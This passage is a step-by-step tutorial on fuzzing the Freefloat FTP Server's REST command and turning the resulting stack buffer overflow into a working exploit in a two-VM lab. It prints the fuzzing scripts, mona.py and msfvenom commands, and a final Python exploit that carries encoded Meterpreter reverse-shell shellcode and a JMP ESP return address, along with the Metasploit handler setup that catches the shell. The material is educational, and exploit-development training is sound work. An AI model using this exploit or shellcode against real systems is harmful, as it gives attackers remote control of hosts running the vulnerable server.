fuzz the FTP service and develop a working exploit. Concepts and Terminology Before we get started we need to cover some of the basic concepts and terminology we will be exploring. During this exercise you will see the words fuzzing, buffer overflow, assembly code, and shellcode used frequently. You do not need to be an expert in any of these concepts to follow along, however a basic understanding of each one is necessary to complete the exercise. Fuzzing Wikipedia – Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. Typically, fuzzers are used to test programs that take structured inputs. This structure is specified, e.g., in a file format or protocol and distinguishes valid from invalid input. An effective fuzzer generates semi-valid inputs that are “valid enough” in that they are not directly rejected by the parser, but do create unexpected behaviors deeper in the program and are “invalid enough” to expose corner cases that have not been properly dealt with. Buffer Overflow Wikipedia – In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program’s state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer’s resources. The famed Morris worm in 1988 used this as one of its attack techniques. Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows, but requires additional code and processing time. Modern operating systems use a variety of techniques to combat malicious buffer overflows, notably by randomizing the layout of memory, or deliberately leaving space between buffers and looking for actions that write into those areas (“canaries”). Shellcode Wikipedia – In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code. Assembly Code Wikipedia – An assembly (or assembler) language, often abbreviated asm, is any low-level programming language in which there is a very strong correspondence between the program’s statements and the architecture’s machine code instructions. Each assembly language is specific to a particular computer architecture and operating system. In contrast, most high-level programming languages are generally portable across multiple architectures but require interpreting or compiling. Assembly language may also be called symbolic machine code. Understanding the Basics In depth coverage of assembly code is way out of scope for this article, however there are a few basic concepts you should be familiar with when tackling this exercise. Below is a quick overview of some common CPU registers that we will be working with: EIP – Register that contains the memory address of the next instruction to be executed by the program. EIP tells the CPU what to do next. ESP – Register pointing to the top of the stack at any time. EBP – Stays consistent throughout a function so that it can be used as a placeholder to keep track of local variables and parameters. EAX – “accumulator” normally used for arithmetic operations. EBX – Base Register. ECX – “counter” normally used to hold a loop index. EDX – Data Register. ESI/EDI – Used by memory transfer instructions. There are tons of tutorials online if you find you need more to follow along. If you want to take a dive into assembly, I highly recommend taking the course on Pentester Academy x86 Assembly Language and Shellcoding on Linux by Vivek Ramachandran. It is worth every penny. For now, we just need to understand that EIP is responsible for controlling program execution, and ESP is where we will be storing our shellcode during exploitation. Discovering the Vulnerability Lets fire up our two virtual machines and get started! To follow along, you will need to ensure that you have the following software installed in each VM. To make things easier to follow you may want to configure each machine to use the following IP addresses, however this is not required. You can simply adjust the IPs in the exercise as you go along if you’d like. Windows VM / IP Address: 172.16.183.129 Freefloat FTP Server Immunity Debugger mona.py Kali Linux VM / IP Address: 172.16.183.131 Wireshark Python 2.7 Metasploit Framework Network Protocol Fuzzing Lets assume that we know nothing at all about the application we are testing. How do we go about finding a vulnerability in a program that we know nothing about? We could try to find the source code online and review it, but what if the source code is not available? In that case we can result to fuzz testing the application. Lets start off by launching the Freefloat FTP Server in our Windows virtual machine as normal. We can already see that this is a very basic FTP server application. It lacks many of the configuration options that we would expect from an FTP service. This application will accept any username/password combination when logging in, as it is designed to be simple. We will be attacking the application across the network, so lets start off by simply connecting to the FTP server from our Kali Linux machine and taking a look at the network traffic. Launch Wireshark and start listening for traffic on the ‘eth0’ interface. To eliminate some unnecessary noise, we will apply ‘ip.addr == 172.16.183.129’ as a filter so that we only see traffic going to the Windows machine. We can authenticate with any credentials we like, but lets keep it simple by simply using the username ‘test’ and the password ‘test’. Now lets examine the traffic in Wireshark so that we can get an idea of how the FTP client talks to the remote FTP server. We will right click on the first line and select “Follow TCP Stream” in order to view the communication between the client and server. The text in blue was sent from the server to the client. The text in red was sent from the client to the server. As we can see, when we connected to the FTP server several commands were sent by our client to establish the connection. Based on the responses we got from the server, it did not appear to understand all of the commands that we sent. The commands it did not understand appear to have been handled gracefully, as we were still able to establish a connection. The following commands appear to be supported based on the information we have so far: USER PASS TYPE PWD CWD PASV PORT LIST At this point we could begin writing a script to fuzz each of these commands to see if we can find a vulnerability, however this is NOT a full list of all the commands supported by the FTP protocol. We could technically continue interacting with the FTP server to get an idea of what other commands are available, but this could take a long time. Instead we will save time by looking at the official RFC (Request for Comments) published for the FTP protocol. Reading the RFCs are very handy when testing network protocols, as they essentially act as a user manual for us to understand what each command does. This will not only help us better understand how the FTP protocol works, but it will save us time manually looking for commands to fuzz test. You can find the official RFC for FTP at the following link: FILE TRANSFER PROTOCOL (FTP) RFC – https://tools.ietf.org/html/rfc959 If we were doing a thorough security assessment of the Freefloat FTP Server application, we would want to fuzz every single command listed in the RFC. To save us some time here, we are going to focus on the REST command. From page 31 in the FTP RFC: RESTART (REST): The argument field represents the server marker at which file transfer is to be restarted. This command does not cause file transfer but skips over the file to the specified data checkpoint. This command shall be immediately followed by the appropriate FTP service command which shall cause file transfer to resume. Lets write a simple python script to connect to the FTP server and fuzz test the REST command. We’ll name this script ‘fuzz.py’: import sys from socket import * ip = "172.16.183.129" port = 21 buf = "\x41" * 1000 print "[+] Connecting..." s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() print "[+] Done." If we break down the above script, we see that it will establish a connection to the FTP server, and then issue the USER command with the value ‘test\r\n’. The ‘\r\n’ piece is what submits the input to the server. Next it will issue the PASS command. Once it has authenticated to the server, it will issue the REST command and specify 1000 A’s as our input. This is likely not what the application expects to receive, so lets see if it gracefully handles our input or crashes. As we can see in our Windows VM, the application has crashed indicating that the program did not gracefully handle the input we supplied to the REST command. This means that we may be looking at a buffer overflow vulnerability in that command. It is important to note that not all application errors and crashes necessarily indicate a vulnerability. In order to determine if this particular bug can be exploited, we will want to explore the crash a little closer in Immunity Debugger. Determining if the bug is exploitable Lets launch Immunity Debugger and reopen the Freefloat FTP Server application. This will give us the ability to watch the flow of execution and determine if the bug we discovered is actually an exploitable vulnerability. At first glance this is a LOT of information to take it. Don’t worry, it will start to make more sense as we go through the exercise. Take note of the box on the upper right hand side. These are the CPU registers we were talking about at the beginning of this article. We will be focusing most of our attention here. The first thing we need to do is take a look at the EIP register. As discussed earlier, EIP contains the memory address for the next CPU instruction. What this means is that if we can overwrite the EIP value by overflowing the buffer allocated to the REST command, we have the ability to control what the program does next. At the moment, we see that EIP contains the value 004040C0. Lets see what happens when we fire our python fuzz script at it again. As we can see, EIP has now changed to 41414141. The number 41 is actually the hex value of the letter ‘A’ (reference). Essentially the EIP register now contains ‘AAAA’. Since EIP now points to an invalid memory address, the application crashes. We now know the cause of the crash we discovered earlier and to our delight, we have discovered that we can actually hijack the flow of execution by overwriting the value stored in the EIP register. This indicates that we have an exploitable buffer overflow vulnerability! Buffer Overflow Exploitation Alright now we’re going to get our hands dirty. Lets quickly recap what we have done so far: Discovered a bug in the REST command which causes the Freefloat FTP Server to crash. Developed a short script called ‘fuzz.py’ which crashes the application by supplying 1000 ‘A’s to the REST command. Determined that the bug we found is in fact an exploitable buffer overflow vulnerability. Now it is time to begin developing a functional exploit. The goal of this exploit will be to obtain an interactive shell on the Windows VM (our victim) from our Kali Linux VM (our attacking machine). This will allow us to compromise the remote host and take control of it. Installing mona.py One of the awesome features of Immunity Debugger is its ability to be extended with Python plugins. Before we go any further, we will want to install a plugin in called mona.py. This will help us out greatly with the tasks ahead. Simply drop the plugin into the PyCommands folder found inside the Immunity Debugger application folder. You can check if mona.py is working by typing ‘!mona’ in the command bar of Immunity Debugger. If everything works, the log window will show the help screen of mona.py. Next, we will configure mona.py to store data in a folder other than the default. The default location is the Immunity Debugger application folder. Instead we will create a folder at the path ‘C:\logs’ and have mona.py store its data there. Execute the following command in the Immunity Debugger command bar: !mona config -set workingfolder c:\logs\%p The command above tells mona.py to create a folder inside the folder ‘C:\logs’, with the name of the process being debugged. In this case it will create a subfolder called ‘FTPServer’ Now we are ready to begin crafting our exploit code. Building the exploit The process for developing our buffer overflow exploit can be summarized into six key tasks. Finding the offset on the buffer to the exact four bytes that overwrite EIP on the stack. Finding enough space in the memory to store our shellcode. Finding the value we must put in EIP to make the execution flow jump to our shellcode in memory. Finding any bad characters that may affect our exploit. Putting it all together. Generating our final payload. We will break down each of these tasks and walk through them step by step. Identifying the offset to EIP First we will need to find the offset in our buffer to the bytes that overwrite the EIP register value. This part of the exploit is critical, as it will allow us to hijack the flow of execution. We can do this by using the ‘pattern create’ feature in mona.py. This creates a unique cyclic pattern (example: Aa0Aa1Aa2Aa3Aa4) where every three-character substring is unique. By replacing the 1000 ‘A’s in our ‘fuzz.py’ script with this pattern, we can calculate the offset by determining which four bytes of the pattern are in EIP when the program crashes. To create a cyclic pattern 1000 bytes in length with mona.py, execute the following command in the Immunity Debugger command bar. !mona pc 1000 You should see the output below: The command created the file ‘C:\logs\FTPServer\pattern.txt’ with the cyclic pattern inside. We can now copy pattern into our existing ‘fuzz.py’ script. We will go ahead and rename this file to ‘exploit.py’ since we are passed the fuzzing stage at this point. Here is what the updated code looks like: import sys from socket import * ip = "172.16.183.129" port = 21 buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" print "[+] Connecting..." s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() print "[+] Done." The next step is to reopen Freefloat FTP Server in Immunity Debugger and execute our script ‘exploit.py’. As expected, we can see that the process has crashed and Immunity Debugger shows an access violation. We need to examine EIP and take note of its value at the crash moment. As we can see the EIP register has been overwritten, this time with a unique 4 byte pattern. Its value at the time of the crash was ‘41326941’, which translates to the characters ‘A2iA’ (reference). If we look close enough at our ‘pattern.txt’ file, we would find this value somewhere inside the pattern we generated earlier. We need to determine the offset by examining the unique pattern and counting how many bytes lead up to ‘A2iA’. This will be our EIP offset. To make our life easier, mona.py offers the findmsp command which will give us the EIP offset, as well as some other very useful information. Execute the following command on the Immunity Debugger command bar: !mona findmsp You should see the output below: This command created a file at ‘C:\logs\FTPServer\findmsp.txt’ which contains some extremely useful information that we will use to develop our exploit: We can see that our EIP offset is 246 bytes. The next 4 bytes after this will overwrite the EIP register. Identifying where to put our shellcode So we now have control over Freefloat FTP Servers flow of execution, but we still need to find a place to store our shellcode. Our shellcode is the actual payload of the exploit, it is what will give us an interactive shell on the remote system. From the output of the ‘!mona findmsp’ command above, we can see that the offset to ESP is 258 bytes. The output also tells us that we have 742 bytes available in ESP to store data. We also notice that the ESP offset is relatively close to the EIP offset in our buffer. Lets do some simple math. If we subtract 246 bytes (EIP offset) from 258 bytes (ESP offset) we get 12 bytes. We will be writing 4 bytes into the EIP register so we will subtract 4 from 12 and get 8 bytes. We have just determined that the ESP offset is only 8 bytes behind our EIP overwrite. Why is this important? Because when we craft our exploit we can overwrite EIP with the address of a JMP ESP instruction, pad our buffer with just 8 more bytes, and then write our shellcode to ESP. If these two offsets were far apart from each other, or if we didn’t have sufficient space in ESP, this exploit could become a lot more complicated. For example, we may potentially run out of buffer room for our shellcode, or need to find another area in memory to place our shellcode. In this case, ESP looks like it would provide a very convenient place for us to store our shellcode. We will eventually try placing our shellcode in the ESP register at offset 258, but we’re not quite ready to do that yet. When we overwrite EIP, our objective will be to change the flow of execution to our shellcode stored in ESP. In order to do that, we will need to get the memory address of a CPU instruction that makes a jump to ESP. We will do this by locating a JMP ESP instruction, and overwriting EIP with the memory address of that instruction. Locating a JMP ESP instruction So we’ve successfully hijacked the application by overwriting EIP, and we think we’ve found a sufficient place in memory to store our shellcode. Next we need to find an existing CPU instruction in the program which will tell the CPU to execute our shellcode stored in ESP. To accomplish this we will locate a JMP ESP instruction in memory using Immunity Debugger and mona.py. In the Immunity Debugger command bar, execute the following command after restarting the Freefloat FTP Server application: !mona jmp -r ESP You should see the output below: The above command tells mona.py to search for a JMP ESP instruction inside the process binary and the DLLs loaded in memory at execution time. The result is stored in the file ‘C:\logs\FTPServer\jmp.txt’. Below is a partial screenshot of the output from that file: We will need to choose a JMP ESP instruction which does not have ASLR enabled, as we need the memory address to persist between restarts of the application. Thankfully in this case, the binary was not compiled with ASLR support. Therefore any of the JMP ESP instructions in this list should work fine for our exploit…almost…(more on that in the next section). We will overwrite EIP with the address of one of these instructions, and that should make the CPU jump to our shellcode. By this point we know just about everything we need to know about Freefloat FTP Server to complete our exploit. We are ready to start building our final payload which will give us a shell on the remote host. Unfortunately there is one more potential pitfall standing in our way. Bad characters! Identifying bad characters So we almost have everything we need to build our exploit. We know how to hijack the flow of execution, we know where to put our payload, and we know how to trick the CPU into executing our payload. Now we are finally ready to start building the payload! There is just one problem, the shellcode we want to use will likely contain one or more characters that the application interprets differently than we want it to. It’s also possible that the memory address for one of our JMP ESP instructions above may contain one of these characters. These are referred to as bad characters, which are essentially any unwanted characters that can break our shellcode. Unfortunately there is no universal set of bad characters. Depending on the application and the developer logic, there will be a different set of bad characters for every program that we encounter. Therefore, we will have to identify the bad characters in this specific application before generating our shellcode. An example of some common bad characters are: 00 (NULL) 0A (Line Feed \n) 0D (Carriage Return \r) FF (Form Feed \f) This part of the process can be a bit tedious and repetitive. We essentially need to overwrite EIP with garbage to crash the application, and then overflow the rest of the buffer with another pattern containing all the possible shellcode characters. Then we examine the stack at the time of crash, and find the first character which breaks the pattern. Once we have identified that character, we remove it from the pattern and repeat the process to find the next bad character. We do this over and over again until we have identified them all. Then we will attempt to generate functional shellcode that is encoded in such a way to exclude these bad characters. This process is made a little easier by using two awesome commands in mona.py, however it is still quite repetitive. Lets break down the task at hand before we examine the commands: We will create a byte array with all possible characters in hex form (0x00 to 0xff) and put them into our exploit. Launch Immunity Debugger and run Freefloat FTP Server. Execute the exploit. After the crash, we’ll examine the byte array in memory. If a byte has changed, it is a bad character. Remove the bad character from the array. Repeat the process until the byte array in memory is equal to the byte array being sent in the buffer. To create the byte array execute the following command in Immunity Debugger: !mona bytearray You should see the output below: The above command will generate two files. The first is ‘C:\logs\FTPServer\bytearray.txt’, which contains the array in text format to use in our exploit. The second is ‘C:\logs\FTPServer\bytearray.bin’, which will contain the exact representation of this byte array in memory. Lets modify our exploit to include the byte array: import sys from socket import * ip = "172.16.183.129" port = 21 bytearray = ( "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) bufsize = 1000 buf = 'A'*246 # EIP offset from findmsp buf += 'BBBB' # EIP overwrite buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP buf += bytearray buf += 'D'*(bufsize - len(buf)) print "[+] Connecting..." s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() print "[+] Done." Note that we put the byte array exactly 8 bytes behind our EIP overwrite (the four ‘B’s) by adding 8 ‘C’s. This is so the ESP register will be pointing directly to the byte array after the application crashes. We also fill the remaining bytes of our buffer with ’D’s to ensure that the buffer length is consistent with our testing earlier (1000 bytes total). Now lets relaunch Immunity Debugger, run Freefloat FTP Server, and fire our revised exploit. Once the application has crashed, enter the following command in Immunity Debugger: !mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C (the address contained on ESP) The above command tells mona.py to compare the memory from the address ‘0x00B3FC2C’ with the content of the bytearray.bin file. This address will likely be different if you are testing on a different operating system such as Windows Vista or Windows 7. As we can see from the ‘Status’ and ‘BadChars’ columns, there is corruption in the first byte due to the character ‘00’ (this is a NULL byte, a common bad character). Lets recreate the byte array excluding this character (0x00) and run the ‘!mona compare’ command again by executing the following command: !mona bytearray -cpb \x00 Now we will update our exploit and remove the ‘\x00’ character from the beginning of byte array. We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once more: !mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C Notice the difference? This time mona.py has detected corruption at 9 bytes due to the ‘0a’ character. Now we will exclude 0x0a from the byte array: !mona bytearray -cpb \x00\x0a Next we will update our exploit and remove the ‘\x0a’ character from the byte array. We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once more: !mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C Once again we’ve identified another bad character. This time it is the ‘0d’ character, so we’ll need to exclude 0x0d from the byte array: !mona bytearray -cpb \x00\x0a\x0d Now we will update our exploit once again and remove the ‘\x0d’ character from the byte array. We then repeat the process, restarting Immunity Debugger and Freefloat FTP Server and executing the ‘!mona compare’ command once again: !mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x00B3FC2C This time the comparison results window indicates the array is ‘Unmodified’. This means that our byte array in memory is equal to the byte array we transmitted in our exploit, thus indicating we have identified all of the bad characters! We now have everything we need to weaponize our exploit. We just need to ensure that our shellcode, JMP ESP instruction, and any other data we transmit in the exploit does not contain the characters 0x00, 0x0a, or 0x0d. Putting it all together Now that we finally have all the information we need to build a working exploit, lets start putting it all together. We’ll first update our exploit by replacing the byte array with some more useful shellcode. We’re also going to choose a JMP ESP instruction from our list earlier to overwrite EIP. We will take caution as to not use a JMP instruction that contains a bad character (0x00, 0x0a, or 0x0d): import sys from socket import * ip = "172.16.183.129" port = 21 # BadChars = \x00\x0a\x0d shellcode = ("\xcc\xcc\xcc\xcc") # Breakpoint bufsize = 1000 eip = "\xd7\x30\x9d\x7c" # 0x7c9d30d7 - jmp esp [SHELL32.dll] (Little Endian) buf = 'A'*246 # EIP offset from findmsp buf += eip # EIP overwrite buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP buf += shellcode buf += 'D'*(bufsize - len(buf)) print "[+] Connecting..." s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() print "[+] Done." In this iteration of our exploit we are use the byte ‘0xcc’ as our shellcode. This is the opcode for the breakpoint instruction. We do this so that once the exploit is launched our process will stop when we get to ESP. This will give us a chance to examine the stack and ensure that everything is working as we expect so far. We are choosing the JMP ESP instruction located at the memory address 0x7c9d30d7 to overwrite EIP. You may be wondering why it is entered in backwards in our exploit. The reason for this is because x86 architecture stores values in memory using Little Endian. This means the memory address has to be reversed byte by byte, in this case 0x7c9d30d7 will be converted to \xd7\x30\x9d\x7c. Now lets fire up Immunity Debugger, launch Freefloat FTP Server, and execute our exploit again: You should notice the application did not crash this time! It actually hit one of our breakpoints and paused the debugger for us. In the above screenshot we can see execution has stopped at the four breakpoint opcodes on the stack just as we expected. This means we are successfully controlling the flow of execution, we just need to replace our current shellcode with the payload we will generate next! Generating our final payload We’ve come so far, we just need to use what we’ve built to get a shell on our target host. To do this we will utilize the Metasploit Framework to generate a Meterpreter reverse shell payload. This will act as our final shellcode. We will then catch this reverse shell on our Kali Linux machine, and through this we will have compromised the remote host with our exploit! Metasploit contains a handy utility called ‘msfvenom’ which we will use to generate our shellcode. We must make sure to tell msfvenom to exclude the bad characters we identified earlier, or our exploit will not work. When we generate shellcode encoded to avoid bad characters, the payload must contain a routine to decode the payload in memory. Msfvenom will handle this for us, however it does come with a catch. The decoding routine will shift the stack around on us, so we will need to move ESP to a location above our shellcode in memory. First, lets go ahead and generate our shellcode payload in Kali Linux by using the following command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.183.131 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f c You should see the output below: Next we need to ensure that ESP is not pointing to the shellcode when the decoder routine is executed. We will do this by adding an instruction which will decrement ESP. To obtain the opcodes that represent the instruction, we will use another tool from the Metasploit Framework, ‘metasm_shell.rb’. Execute the following commands on Kali Linux: cd /usr/share/metasploit-framework/tools/exploit/ ./metasm_shell.rb The ‘metasm_shell.rb’ script will give us an interactive prompt where we can enter CPU instructions and get the appropriate opcodes. Since we want to decrement ESP, we will try the following command: metasm > sub esp,240h "\x81\xec\x40\x02\x00\x00" Uh oh, we’ve hit a snag. Notice that the opcode we got contains one of our bad characters (\x00). This would break our exploit. Lets see if we can find another instruction that will achieve the same result, but hopefully not result in opcode with bad characters. Instead of subtracting from ESP, lets try to add a negative number to it and see what happens: metasm > add esp,-240h "\x81\xc4\xc0\xfd\xff\xff" Excellent, no bad characters this time! We can now exit metasm and finish building our exploit using: metasm > quit The Final Exploit We are finally ready to build a weaponized exploit. Lets update the exploit to include the shellcode we’ve generated with ‘msfvenom’, and add the opcodes we got from ‘metasm_shell.rb’ to decrement ESP. This will complete the final exploit: import sys from socket import * ip = "172.16.183.129" port = 21 # Windows reverse shell shellcode = ( "\xb8\x18\xae\xa3\x93\xd9\xeb\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" "\x56\x31\x47\x13\x83\xef\xfc\x03\x47\x17\x4c\x56\x6f\xcf\x12" "\x99\x90\x0f\x73\x13\x75\x3e\xb3\x47\xfd\x10\x03\x03\x53\x9c" "\xe8\x41\x40\x17\x9c\x4d\x67\x90\x2b\xa8\x46\x21\x07\x88\xc9" "\xa1\x5a\xdd\x29\x98\x94\x10\x2b\xdd\xc9\xd9\x79\xb6\x86\x4c" "\x6e\xb3\xd3\x4c\x05\x8f\xf2\xd4\xfa\x47\xf4\xf5\xac\xdc\xaf" "\xd5\x4f\x31\xc4\x5f\x48\x56\xe1\x16\xe3\xac\x9d\xa8\x25\xfd" "\x5e\x06\x08\x32\xad\x56\x4c\xf4\x4e\x2d\xa4\x07\xf2\x36\x73" "\x7a\x28\xb2\x60\xdc\xbb\x64\x4d\xdd\x68\xf2\x06\xd1\xc5\x70" "\x40\xf5\xd8\x55\xfa\x01\x50\x58\x2d\x80\x22\x7f\xe9\xc9\xf1" "\x1e\xa8\xb7\x54\x1e\xaa\x18\x08\xba\xa0\xb4\x5d\xb7\xea\xd0" "\x92\xfa\x14\x20\xbd\x8d\x67\x12\x62\x26\xe0\x1e\xeb\xe0\xf7" "\x17\xfb\x12\x27\x9f\x6c\xed\xc8\xdf\xa5\x2a\x9c\x8f\xdd\x9b" "\x9d\x44\x1e\x23\x48\xf0\x14\xb3\xdf\x14\x9e\xc0\x48\x16\xe0" "\xc7\x33\x9f\x06\x97\x13\xcf\x96\x58\xc4\xaf\x46\x31\x0e\x20" "\xb8\x21\x31\xeb\xd1\xc8\xde\x45\x89\x64\x46\xcc\x41\x14\x87" "\xdb\x2f\x16\x03\xe9\xd0\xd9\xe4\x98\xc2\x0e\x93\x62\x1b\xcf" "\x36\x62\x71\xcb\x90\x35\xed\xd1\xc5\x71\xb2\x2a\x20\x02\xb5" "\xd5\xb5\x32\xcd\xe0\x23\x7a\xb9\x0c\xa4\x7a\x39\x5b\xae\x7a" "\x51\x3b\x8a\x29\x44\x44\x07\x5e\xd5\xd1\xa8\x36\x89\x72\xc1" "\xb4\xf4\xb5\x4e\x47\xd3\xc5\x89\xb7\xa1\xe1\x31\xdf\x59\xb2" "\xc1\x1f\x30\x32\x92\x77\xcf\x1d\x1d\xb7\x30\xb4\x76\xdf\xbb" "\x59\x34\x7e\xbb\x73\x98\xde\xbc\x70\x01\xd1\xc7\xf9\xb6\x12" "\x38\x10\xd3\x13\x38\x1c\xe5\x28\xee\x25\x93\x6f\x32\x12\xac" "\xda\x17\x33\x27\x24\x0b\x43\x62" ) bufsize = 1000 eip = "\xd7\x30\x9d\x7c" # 0x7c9d30d7 - jmp esp [SHELL32.dll] (Little endian) move_esp = "\x81\xc4\xc0\xfd\xff\xff" # add esp,-240h buf = 'A'*246 # EIP offset from findmsp buf += eip # EIP overwrite buf += move_esp buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP buf += shellcode buf += 'D'*(bufsize - len(buf)) print "[+] Connecting..." s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() print "[+] Done." Now we will start up Metasploit on our Kali linux machine with the following command: msfconsole Once it loads we will configure a listener to wait for our reverse shell. Execute the following commands in the Metasploit console: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.183.131 set LPORT 443 exploit You should see the output below: Finally we ready to test our exploit. Launch Freefloat FTP Server once again, and fire our final exploit. If all goes well, we should receive a Windows command shell on our Metasploit listener. If it worked, congratulations! You have just successfully exploited a buffer overflow vulnerability and obtained and interactive shell on the target! Sursa: 